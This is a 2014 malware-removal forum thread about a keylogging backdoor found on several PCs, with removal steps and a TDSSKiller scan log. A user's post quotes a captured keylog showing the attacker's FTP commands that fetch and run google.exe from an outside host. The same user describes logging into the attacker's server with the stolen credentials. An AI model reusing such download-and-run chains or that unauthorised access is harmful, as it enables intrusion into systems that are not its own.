Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

MSWINHOST.exe


  • Please log in to reply
4 replies to this topic

#1 mklein

mklein

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:11:31 PM

Posted 15 April 2014 - 02:35 PM

Has anyone seen this file before?

 

I have seen this process running on 4 different machines now.  There's not much information for this file on Google.  From what I found on Google it's a 'Backdoor.Win32.Rbot.awg'.  MS Security Essentials, and MBAM did not detect this.  ComboFix was able to remove it from the first two machines I found it on, but not the third.  This file resides in C:\Users\AppData\Roaming\AdobeFlashPlayer  There is one other file in that folder called Log.txt, It records all key strokes.  After ending the process it starts again about 10 minutes later.  When mswinhost is NOT running log.txt does NOT record key strokes.  Any help on this would be greatly appreciated.  Thanks!

 

File Properties / Details Tab

 

File Description:  blank

Type:  Application

File version:  1.6.0.3

Product name:  Bremsbare

Product version: 1.0.6.0003

Copyright: blank

Size:  88.0 KB

Date Modified: 7/14/2009 3:23 PM

Language: English (United States)

Original filename:  link sextreme Dreierlinie.exe

 

 



BC AdBot (Login to Remove)

 


#2 Netghost56

Netghost56

  • Members
  • 973 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Texas
  • Local time:01:31 AM

Posted 15 April 2014 - 02:48 PM

Don't know if I would trust it. Try uninstalling your Adobe and reinstalling the latest version.

 

It looks like its trying to hide as WINHOST.exe, which is a valid file, though that claim is dubious as well...

 

from http://www.file.net/process/winhost.exe.html

 

 

Winhost.exe is a executable file (a program) for Windows. The filename extension .exe is the abbreviation for executable. Only run executable files from publishers you trust, because executable files can potentially change your computer settings or harm your computer. The free file information forum can help you determine if winhost.exe is a virus, trojan, spyware, or adware that you can remove, or a file belonging to a Windows system or an application you can trust.

Winhost.exe file information

The process known as winhost appears to belong to software Microsoft IE Hostname or Microsoft IE Hostname Update or Microsoft Windows Operating System by Microsoft (www.microsoft.com) or Local Microsystem.

Description: winhost.exe is located in the folder C:\Windows\System32. Known file sizes on Windows 7/XP are 137,728 bytes (38% of all occurrences), 60,416 bytes and 5 more variants. space.gif 
There is no description of the program. The program has no visible window. Winhost.exe is located in the Windows folder, but it is not a Windows core file. The application starts upon Windows startup (see Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce). The winhost.exe file is not a Windows core file. The software uses ports to connect to a LAN or the Internet. Winhost.exe is able to monitor applications, record inputs, hide itself and manipulate other programs. Therefore the technical security rating is 84% dangerous, however also read the users reviews.


Edited by Netghost56, 15 April 2014 - 02:48 PM.


#3 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,082 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:02:31 AM

Posted 15 April 2014 - 04:10 PM

Backdoor:Win32/Rbot.gen is a generic detection for a family of backdoor trojans that allows attackers to control infected computers. After a computer is infected, the trojan connects to a specific IRC server and joins a specific channel to receive commands from attackers. Commands can instruct the trojan to spread to other computers by scanning for network shares with weak passwords, exploiting Windows vulnerabilities, and spreading through backdoor ports opened by other families of malicious software. The trojan can also allow attackers to perform other backdoor functions, such as launching denial of service (DoS) attacks and retrieving system information from infected computers.

 
Some would say with this infection the oly true guarantee of removal is a Reformat..
 If you want to try these do so.
 

Download TDSSKiller and save it to your desktop.
  • Extract (unzip) its contents to your desktop.
  • Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.
  • .
    .
    .
     ESET.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#4 mklein

mklein
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:11:31 PM

Posted 16 April 2014 - 02:18 PM

A little more insight to this.  This morning I looked at the log.txt file and found this;

"[Run] - [16/04/2014 02:35:01]
cmd[Enter]

[Administrator: C:\Windows\system32\cmd.exe] - [16/04/2014 02:35:05]

ftp -v xhob.de[Enter]**MASKED USER**[Enter]**MASKED PW**[Enter]hash[Enter]bin[Enter]cd httpdocs[Enter]get google.exe[Enter]bye[Enter]google.exe[Enter]"

 

                       

I also saw that mswinhost.exe was Gone from the system. I think the attacker may have been onto me and deleted mswinhost and created a new virus. I did see where the attacker executed google.exe.  Did not see that process running but saw javaw.exe.  Opened file location and it pointed to C:\Users\AppData\Roaming\OracleFlashPlayer.  There was Log.txt inside which was key-logging.  I was able to access the attackers FTP by using the user and pass from the log file.  I went ahead and MASKED those here, and bulk transferred all files.  I don't see any log.txt files in there and no record in the log where he transferred anything.  Below are the results of the scan.  IPscan.exe is a file we put on there for us to use and that was detected and removed.

 

 

09:26:59.0493 0x03e4  TDSS rootkit removing tool 3.0.0.31 Apr 11 2014 08:55:10
09:27:39.0496 0x03e4  ============================================================
09:27:39.0497 0x03e4  Current date / time: 2014/04/16 09:27:39.0496
09:27:39.0497 0x03e4  SystemInfo:
09:27:39.0497 0x03e4 
09:27:39.0497 0x03e4  OS Version: 6.1.7601 ServicePack: 1.0
09:27:39.0497 0x03e4  Product type: Workstation
09:27:39.0497 0x03e4  ComputerName: T1
09:27:39.0498 0x03e4  UserName: POS
09:27:39.0498 0x03e4  Windows directory: C:\Windows
09:27:39.0498 0x03e4  System windows directory: C:\Windows
09:27:39.0498 0x03e4  Processor architecture: Intel x86
09:27:39.0498 0x03e4  Number of processors: 4
09:27:39.0498 0x03e4  Page size: 0x1000
09:27:39.0498 0x03e4  Boot type: Normal boot
09:27:39.0498 0x03e4  ============================================================
09:27:40.0785 0x03e4  KLMD registered as C:\Windows\system32\drivers\14929775.sys
09:27:41.0238 0x03e4  System UUID: {0AE3FCCE-B09C-EAF9-88F1-9F6B5FCA8F5A}
09:27:43.0413 0x03e4  Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 (298.09 Gb), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
09:27:43.0618 0x03e4  ============================================================
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0:
09:27:43.0618 0x03e4  MBR partitions:
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x253FBAB0
09:27:43.0618 0x03e4  ============================================================
09:27:43.0643 0x03e4  C: <-> \Device\Harddisk0\DR0\Partition2
09:27:43.0643 0x03e4  ============================================================
09:27:43.0643 0x03e4  Initialize success
09:27:43.0643 0x03e4  ============================================================
09:27:59.0349 0x0a3c  ============================================================
09:27:59.0349 0x0a3c  Scan started
09:27:59.0349 0x0a3c  Mode: Manual;
09:27:59.0349 0x0a3c  ============================================================
09:27:59.0349 0x0a3c  KSN ping started
09:28:02.0253 0x0a3c  KSN ping finished: true
09:28:02.0407 0x0a3c  ================ Scan system memory ========================
09:28:02.0407 0x0a3c  System memory - ok
09:28:02.0408 0x0a3c  ================ Scan services =============================
09:28:02.0609 0x0a3c  [ 1B133875B8AA8AC48969BD3458AFE9F5, 01753BDD47F3F9BC0E0D23A069B9C56D4AE6A6B6295BC19B95AE245D25B12744 ] 1394ohci        C:\Windows\system32\drivers\1394ohci.sys
09:28:02.0619 0x0a3c  1394ohci - ok
09:28:02.0713 0x0a3c  [ CEA80C80BED809AA0DA6FEBC04733349, AE69C142DC2210A4AE657C23CEA4A6E7CB32C4F4EBA039414123CAC52157509B ] ACPI            C:\Windows\system32\drivers\ACPI.sys
09:28:02.0727 0x0a3c  ACPI - ok
09:28:02.0783 0x0a3c  [ 1EFBC664ABFF416D1D07DB115DCB264F, BF94D069D692140B792DBF4FD3CB0127D27C26CC5BFB6B0C28A8B6346767EE58 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
09:28:02.0786 0x0a3c  AcpiPmi - ok
09:28:02.0856 0x0a3c  [ B362181ED3771DC03B4141927C80F801, 69514E5177A0AEA89C27C2234712F9F82E8D8F99E1FD4273898C9324C6FF7472 ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
09:28:02.0861 0x0a3c  AdobeARMservice - ok
09:28:02.0969 0x0a3c  [ 9D96B0D5855FD1B98023B3EEC9F06786, E4C79233158BE8AA4E9C6DD71585E5D2703A5156531EB3D692D7D81BC443E844 ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
09:28:02.0981 0x0a3c  AdobeFlashPlayerUpdateSvc - ok
09:28:03.0051 0x0a3c  [ 21E785EBD7DC90A06391141AAC7892FB, A2D3D764C5E6DC0AD5AAF48485FFB8B121D2A40DC08ECF2D2CB92278A1002B25 ] adp94xx         C:\Windows\system32\drivers\adp94xx.sys
09:28:03.0085 0x0a3c  adp94xx - ok
09:28:03.0145 0x0a3c  [ 0C676BC278D5B59FF5ABD57BBE9123F2, 339E8A433D186BAAB6FCB44C82CC9FB6FCD63C87981449494CBEB2072CB6B7BB ] adpahci         C:\Windows\system32\drivers\adpahci.sys
09:28:03.0179 0x0a3c  adpahci - ok
09:28:03.0218 0x0a3c  [ 7C7B5EE4B7B822EC85321FE23A27DB33, A934AFB71D439555E6376DA9B34F82E8D39A300A4547BE9AC9311F6A3C36270C ] adpu320         C:\Windows\system32\drivers\adpu320.sys
09:28:03.0226 0x0a3c  adpu320 - ok
09:28:03.0267 0x0a3c  [ 8B5EEFEEC1E6D1A72A06C526628AD161, 026CDF4C96F4D493E7BABF79A14C4B0B5ADCCEF0B081FFFA2E3B243B2414167F ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
09:28:03.0271 0x0a3c  AeLookupSvc - ok
09:28:03.0326 0x0a3c  [ F81BB7E487EDCEAB630A7EE66CF23913, 7D1638FD7E388EF670FA0A421762E0413351058A20DDF0F9988A383F05395A68 ] AFD             C:\Windows\system32\drivers\afd.sys
09:28:03.0349 0x0a3c  AFD - ok
09:28:03.0389 0x0a3c  [ 507812C3054C21CEF746B6EE3D04DD6E, D7E59350AC338AD229E3D10C76E32AE16D120311B263714A9CD94AB538633B0E ] agp440          C:\Windows\system32\drivers\agp440.sys
09:28:03.0393 0x0a3c  agp440 - ok
09:28:03.0436 0x0a3c  [ 8B30250D573A8F6B4BD23195160D8707, 64EC289AFCD63D84EAFD9D81C50D0A77BCC79A1EFF32C50B2776BB0C0151757D ] aic78xx         C:\Windows\system32\drivers\djsvs.sys
09:28:03.0441 0x0a3c  aic78xx - ok
09:28:03.0488 0x0a3c  [ 18A54E132947CD98FEA9ACCC57F98F13, 9D39AF972785E49F0DD12C4BAEF39A79CD69F098886BF152AF1B7CCE2E902115 ] ALG             C:\Windows\System32\alg.exe
09:28:03.0493 0x0a3c  ALG - ok
09:28:03.0528 0x0a3c  [ 0D40BCF52EA90FC7DF2AEAB6503DEA44, 1D1AA8F50935D976C29DE7A84708CADBBBDD936F0DD2C059E820F0D21367B3B6 ] aliide          C:\Windows\system32\drivers\aliide.sys
09:28:03.0531 0x0a3c  aliide - ok
09:28:03.0566 0x0a3c  [ 3C6600A0696E90A463771C7422E23AB5, 370B33DC1C25B981628A318BAE434A78A5F0A0DA93C2896DC7A3D7B87AE1A5E7 ] amdagp          C:\Windows\system32\drivers\amdagp.sys
09:28:03.0570 0x0a3c  amdagp - ok
09:28:03.0599 0x0a3c  [ CD5914170297126B6266860198D1D4F0, 2239FCBD1A7EC27CE4F10DA36AE6BD6CCB87E5128C82CA71B84BFE5AF5602A60 ] amdide          C:\Windows\system32\drivers\amdide.sys
09:28:03.0602 0x0a3c  amdide - ok
09:28:03.0649 0x0a3c  [ 00DDA200D71BAC534BF56A9DB5DFD666, CA316B1FFD85BA1CF8664B3229DA1F238A5341E016059F7ED89702324CFD124B ] AmdK8           C:\Windows\system32\drivers\amdk8.sys
09:28:03.0653 0x0a3c  AmdK8 - ok
09:28:03.0674 0x0a3c  [ 3CBF30F5370FDA40DD3E87DF38EA53B6, 7EACF1743367BE805357B6FD10F8F99E9B1C301FE3782D77719347B13DFA65EC ] AmdPPM          C:\Windows\system32\drivers\amdppm.sys
09:28:03.0679 0x0a3c  AmdPPM - ok
09:28:03.0715 0x0a3c  [ D320BF87125326F996D4904FE24300FC, F767D8C5C58D57202905D829F7AE1B1FF33937F407FDCE4C90E32A6638F27416 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
09:28:03.0721 0x0a3c  amdsata - ok
09:28:03.0760 0x0a3c  [ EA43AF0C423FF267355F74E7A53BDABA, 3F1335909AB0281A2FBDD7AD90E18309E091656CD32B48894B992789D8C61DB4 ] amdsbs          C:\Windows\system32\drivers\amdsbs.sys
09:28:03.0769 0x0a3c  amdsbs - ok
09:28:03.0837 0x0a3c  [ 46387FB17B086D16DEA267D5BE23A2F2, 8B8AC61B91F154B4EB5CC6DECB5FCCEBA8B42EFE94859947136AD06681EA8ED0 ] amdxata         C:\Windows\system32\drivers\amdxata.sys
09:28:03.0839 0x0a3c  amdxata - ok
09:28:03.0873 0x0a3c  [ AEA177F783E20150ACE5383EE368DA19, 8FA9EE27AA1F22E8B8FE33A21028CA1E0062BAA95CB132C20D55B98C03B4254F ] AppID           C:\Windows\system32\drivers\appid.sys
09:28:03.0878 0x0a3c  AppID - ok
09:28:03.0921 0x0a3c  [ 62A9C86CB6085E20DB4823E4E97826F5, E0F840B49710022C4FB437002AD06F64B0F6B5D628B32D00F2B66765E6B97E4B ] AppIDSvc        C:\Windows\System32\appidsvc.dll
09:28:03.0925 0x0a3c  AppIDSvc - ok
09:28:03.0948 0x0a3c  [ EACFDF31921F51C097629F1F3C9129B4, 24138755D823E69760579ECBD672421192457CDC9941B2BC499C2D34D83E86C3 ] Appinfo         C:\Windows\System32\appinfo.dll
09:28:03.0964 0x0a3c  Appinfo - ok
09:28:04.0017 0x0a3c  [ A45D184DF6A8803DA13A0B329517A64A, C1D16B60A6D69689AE951DC3D6884ED2E233D144B3FC0B86BC1C50AAAAA01ED2 ] AppMgmt         C:\Windows\System32\appmgmts.dll
09:28:04.0027 0x0a3c  AppMgmt - ok
09:28:04.0055 0x0a3c  [ 2932004F49677BD84DBC72EDB754FFB3, 73F84582244AC53994A2F4499A119B4A84A6BF7FD3046C29A8080C763DE540B8 ] arc             C:\Windows\system32\drivers\arc.sys
09:28:04.0060 0x0a3c  arc - ok
09:28:04.0088 0x0a3c  [ 5D6F36C46FD283AE1B57BD2E9FEB0BC7, F7C9C3B4F2C816F57A43B2921672858C291054220BADE291044343778216F6BA ] arcsas          C:\Windows\system32\drivers\arcsas.sys
09:28:04.0094 0x0a3c  arcsas - ok
09:28:04.0204 0x0a3c  [ 9D768C43FEF254DD50B1DBF8AD5C4C0B, A50854EA5C08605133B8BB4DFDC6090357C5665314AA72E0BFA1E07D4E451F09 ] aspnet_state    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
09:28:04.0223 0x0a3c  aspnet_state - ok
09:28:04.0255 0x0a3c  [ ADD2ADE1C2B285AB8378D2DAAF991481, 7965A705F37924C0EC7A934E64E89C5DF4069816E2EEA3509E0AC90F78910519 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
09:28:04.0258 0x0a3c  AsyncMac - ok
09:28:04.0309 0x0a3c  [ 338C86357871C167A96AB976519BF59E, F28CC534523D1701B0552F5D7E18E88369C4218BDB1F69110C3E31D395884AD6 ] atapi           C:\Windows\system32\drivers\atapi.sys
09:28:04.0311 0x0a3c  atapi - ok
09:28:04.0374 0x0a3c  [ CE3B4E731638D2EF62FCB419BE0D39F0, 3B98179CB0101778D9E7810D2CD46D9C0D7120E141BA11471666E7D9EB3C93CC ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
09:28:04.0407 0x0a3c  AudioEndpointBuilder - ok
09:28:04.0447 0x0a3c  [ CE3B4E731638D2EF62FCB419BE0D39F0, 3B98179CB0101778D9E7810D2CD46D9C0D7120E141BA11471666E7D9EB3C93CC ] Audiosrv        C:\Windows\System32\Audiosrv.dll
09:28:04.0469 0x0a3c  Audiosrv - ok
09:28:04.0494 0x0a3c  [ 6E30D02AAC9CAC84F421622E3A2F6178, 229DC527C1D6C778BCA2C855A2A6F6D2C4B0F4F6DE56C886B3AAD26E3347952C ] AxInstSV        C:\Windows\System32\AxInstSV.dll
09:28:04.0501 0x0a3c  AxInstSV - ok
09:28:04.0549 0x0a3c  [ 1A231ABEC60FD316EC54C66715543CEC, 09E2897BA80737997A286EA5408C03DD3CC0EBACD24CB391C2455B6D4BE7D67E ] b06bdrv         C:\Windows\system32\drivers\bxvbdx.sys
09:28:04.0583 0x0a3c  b06bdrv - ok
09:28:04.0633 0x0a3c  [ BD8869EB9CDE6BBE4508D869929869EE, F4363A12EBFDBB89C69FD59B22F9EE05BADA07D477A1DF2DE01F59D6EE496543 ] b57nd60x        C:\Windows\system32\DRIVERS\b57nd60x.sys
09:28:04.0664 0x0a3c  b57nd60x - ok
09:28:04.0704 0x0a3c  [ EE1E9C3BB8228AE423DD38DB69128E71, ED54FD9795F3A4D32F02BED6052AD9404409A05644CDBEBFF19C662D104DA95A ] BDESVC          C:\Windows\System32\bdesvc.dll
09:28:04.0710 0x0a3c  BDESVC - ok
09:28:04.0730 0x0a3c  [ 505506526A9D467307B3C393DEDAF858, 8AD6F1492E357F57CF42261497BA29122045D4FC0DCC9669AA5AC9B2A4BABFA4 ] Beep            C:\Windows\system32\drivers\Beep.sys
09:28:04.0733 0x0a3c  Beep - ok
09:28:04.0792 0x0a3c  [ 1E2BAC209D184BB851E1A187D8A29136, 53933C938DA5126986FFF2918C1F522ABE93ABAB460AE32E4453161C2F7B68DF ] BFE             C:\Windows\System32\bfe.dll
09:28:04.0828 0x0a3c  BFE - ok
09:28:04.0890 0x0a3c  [ E585445D5021971FAE10393F0F1C3961, 178C008A9A0A6BFDA65EB0B98C510271360AD4474F22F13594F5EB60AA4E1CF5 ] BITS            C:\Windows\System32\qmgr.dll
09:28:04.0956 0x0a3c  BITS - ok
09:28:04.0987 0x0a3c  [ 2287078ED48FCFC477B05B20CF38F36F, 55BCA6174E6034A8D61CBE4126B2F1989F6052BFA624BEA9C0A0A664AEC74521 ] blbdrive        C:\Windows\system32\drivers\blbdrive.sys
09:28:04.0991 0x0a3c  blbdrive - ok
09:28:05.0030 0x0a3c  [ 8F2DA3028D5FCBD1A060A3DE64CD6506, E234672E9CFE1A95AD2E78E306E41E010B870221E6EBBC0E2B0BE2FA5CE0CD76 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
09:28:05.0034 0x0a3c  bowser - ok
09:28:05.0058 0x0a3c  [ 9F9ACC7F7CCDE8A15C282D3F88B43309, A9131334BD9CF8FD60BA9D54AA054E2DF2BE1219FB650DF1464F2787BDEAE98F ] BrFiltLo        C:\Windows\system32\drivers\BrFiltLo.sys
09:28:05.0061 0x0a3c  BrFiltLo - ok
09:28:05.0097 0x0a3c  [ 56801AD62213A41F6497F96DEE83755A, 0DEB8318FB47DF6473C171C795C735E26A73FA12232876C6856549EA16F33361 ] BrFiltUp        C:\Windows\system32\drivers\BrFiltUp.sys
09:28:05.0099 0x0a3c  BrFiltUp - ok
09:28:05.0141 0x0a3c  [ 3DAA727B5B0A45039B0E1C9A211B8400, 903B51E75F0C503A0E255120F53BF51B047B219FEC1E15F2F1D02DDD562FC73B ] Browser         C:\Windows\System32\browser.dll
09:28:05.0148 0x0a3c  Browser - ok
09:28:05.0197 0x0a3c  [ 845B8CE732E67F3B4133164868C666EA, 9309B094CD9B5EBC46295A5EB806BED472C3CEDE3B5F6F497EBDABA496A2A27F ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
09:28:05.0219 0x0a3c  Brserid - ok
09:28:05.0238 0x0a3c  [ 203F0B1E73ADADBBB7B7B1FABD901F6B, 782FA7B26940FE479C49C9BAA2EB582CDAAAD607013E9BCFC85E6FBBB7D49A6D ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
09:28:05.0244 0x0a3c  BrSerWdm - ok
09:28:05.0268 0x0a3c  [ BD456606156BA17E60A04E18016AE54B, DFBDC9DA6A3EA40BACFF204BC6C55C2C122B5885D2CBF6D45054DE43EE15EC4D ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
09:28:05.0271 0x0a3c  BrUsbMdm - ok
09:28:05.0301 0x0a3c  [ AF72ED54503F717A43268B3CC5FAEC2E, 4A638669B0C30B1BDED242A8BF2015A37749570FF4D67D190BACC8D7E0C44468 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
09:28:05.0303 0x0a3c  BrUsbSer - ok
09:28:05.0328 0x0a3c  [ ED3DF7C56CE0084EB2034432FC56565A, B5B75E002E7BC0209582C635CCCA26DB569BDB23C33A126634E00C6434BF941B ] BTHMODEM        C:\Windows\system32\drivers\bthmodem.sys
09:28:05.0333 0x0a3c  BTHMODEM - ok
09:28:05.0375 0x0a3c  [ 1DF19C96EEF6C29D1C3E1A8678E07190, 1F4BB161FF3A1C5B1465BB52F3520FEDB7ACB1FAA132466F07D16DB8E394AEA5 ] bthserv         C:\Windows\system32\bthserv.dll
09:28:05.0381 0x0a3c  bthserv - ok
09:28:05.0409 0x0a3c  [ 77EA11B065E0A8AB902D78145CA51E10, 160EB3BBE9E5F3CC4A02584E6F2576A812C7565B940D74838B983F1EE51FA73A ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
09:28:05.0414 0x0a3c  cdfs - ok
09:28:05.0457 0x0a3c  [ BE167ED0FDB9C1FA1133953C18D5A6C9, E26A851CA13E7300F977E5B20FA5D25FD0E1442AB6AD5DB58BBDB2DAAD87027C ] cdrom           C:\Windows\system32\drivers\cdrom.sys
09:28:05.0464 0x0a3c  cdrom - ok
09:28:05.0494 0x0a3c  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] CertPropSvc     C:\Windows\System32\certprop.dll
09:28:05.0499 0x0a3c  CertPropSvc - ok
09:28:05.0532 0x0a3c  [ 3FE3FE94A34DF6FB06E6418D0F6A0060, 6B3A2A26609A75B690D4C0B3059E40822F3B3DB08943F58EC496BABDA7D0A735 ] circlass        C:\Windows\system32\drivers\circlass.sys
09:28:05.0536 0x0a3c  circlass - ok
09:28:05.0576 0x0a3c  [ 635181E0E9BBF16871BF5380D71DB02D, 58D5150C6F3B9F1730FFDF3A8A2ABF5FF207F9785BD66C0C1E03A0F1C223A26A ] CLFS            C:\Windows\system32\CLFS.sys
09:28:05.0598 0x0a3c  CLFS - ok
09:28:05.0661 0x0a3c  [ D88040F816FDA31C3B466F0FA0918F29, 39D3630E623DA25B8444B6D3AAAB16B98E7E289C5619E19A85D47B74C71449F3 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
09:28:05.0666 0x0a3c  clr_optimization_v2.0.50727_32 - ok
09:28:05.0710 0x0a3c  [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
09:28:05.0737 0x0a3c  clr_optimization_v4.0.30319_32 - ok
09:28:05.0780 0x0a3c  [ DEA805815E587DAD1DD2C502220B5616, 2D6A7668C95352B818F5EC59FF462894935833D34190257DA9CAC7E67FD3631C ] CmBatt          C:\Windows\system32\drivers\CmBatt.sys
09:28:05.0783 0x0a3c  CmBatt - ok
09:28:05.0813 0x0a3c  [ C537B1DB64D495B9B4717B4D6D9EDBF2, 400EEFE662DE117C9CC956E4CBD5E98F28F962E7447CD93E8A78FDD8CA39EB4B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
09:28:05.0817 0x0a3c  cmdide - ok
09:28:05.0872 0x0a3c  [ 85449EEBE8F8EBD6481EFBF0F352B4EB, E6FF04970C5A5BFDE7297A86C1C7B9BFE2E0F976A1A1AFB874CEB488DC6151CC ] CNG             C:\Windows\system32\Drivers\cng.sys
09:28:05.0911 0x0a3c  CNG - ok
09:28:05.0949 0x0a3c  [ A6023D3823C37043986713F118A89BEE, FAC239A7FA6251C7EDFFA34B4BAE3910B8BC0BD4A3574B6DB6931A8D691E207B ] Compbatt        C:\Windows\system32\drivers\compbatt.sys
09:28:05.0952 0x0a3c  Compbatt - ok
09:28:05.0988 0x0a3c  [ CBE8C58A8579CFE5FCCF809E6F114E89, AC083A1C649EBA18C59FCC1772D0784B10E2B8C63094E3C14388E147DBC3F6DF ] CompositeBus    C:\Windows\system32\drivers\CompositeBus.sys
09:28:05.0991 0x0a3c  CompositeBus - ok
09:28:06.0010 0x0a3c  COMSysApp - ok
09:28:06.0050 0x0a3c  [ 2C4EBCFC84A9B44F209DFF6C6E6C61D1, 6FC323217D82EF661BA0E3F949B61B05BB5235D1A69C81D24876C2153FAECEF6 ] crcdisk         C:\Windows\system32\drivers\crcdisk.sys
09:28:06.0053 0x0a3c  crcdisk - ok
09:28:06.0110 0x0a3c  [ 7CA1BECEA5DE2643ADDAD32670E7A4C9, E3AB4CC52A97E3855D7EAB87363F807FDD2162ED8C76A036CD71549ED64E7797 ] CryptSvc        C:\Windows\system32\cryptsvc.dll
09:28:06.0119 0x0a3c  CryptSvc - ok
09:28:06.0180 0x0a3c  [ 3C2177A897B4CA2788C6FB0C3FD81D4B, 98575CBD0664586E6211D02E71BDD52CBAA149A1658573550E29E74E5F7B1553 ] CSC             C:\Windows\system32\drivers\csc.sys
09:28:06.0222 0x0a3c  CSC - ok
09:28:06.0275 0x0a3c  [ 15F93B37F6801943360D9EB42485D5D3, DD6838C6496CB15F8BB57A6596F6A64ADD9C36B09F062295699131232712B558 ] CscService      C:\Windows\System32\cscsvc.dll
09:28:06.0311 0x0a3c  CscService - ok
09:28:06.0382 0x0a3c  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] DcomLaunch      C:\Windows\system32\rpcss.dll
09:28:06.0415 0x0a3c  DcomLaunch - ok
09:28:06.0459 0x0a3c  [ 8D6E10A2D9A5EED59562D9B82CF804E1, 888F9650F4E872BA8F4E0C27E38A6672A561042B17EBA40E306A22357965B0AD ] defragsvc       C:\Windows\System32\defragsvc.dll
09:28:06.0480 0x0a3c  defragsvc - ok
09:28:06.0525 0x0a3c  [ F024449C97EC1E464AAFFDA18593DB88, 7EF1E241892E098A472BCA14C724DFF1AACCF190954AF1C4A38B6D542CC74BD2 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
09:28:06.0530 0x0a3c  DfsC - ok
09:28:06.0587 0x0a3c  [ E9E01EB683C132F7FA27CD607B8A2B63, 4D9037B458C522874619143A4176BCED42472C68933E6E83D37B67242706F3C4 ] Dhcp            C:\Windows\system32\dhcpcore.dll
09:28:06.0620 0x0a3c  Dhcp - ok
09:28:06.0648 0x0a3c  [ 1A050B0274BFB3890703D490F330C0DA, 79D74F4679A2EE040FAAF4D0392A9311239A10A5F8A5CCB48656C6F89B6D62FB ] discache        C:\Windows\system32\drivers\discache.sys
09:28:06.0656 0x0a3c  discache - ok
09:28:06.0705 0x0a3c  [ 565003F326F99802E68CA78F2A68E9FF, ABC42B24DBA4FFC411120E09278EF26AF56CCAB463B69B4BD6C530B4A07063D2 ] Disk            C:\Windows\system32\drivers\disk.sys
09:28:06.0712 0x0a3c  Disk - ok
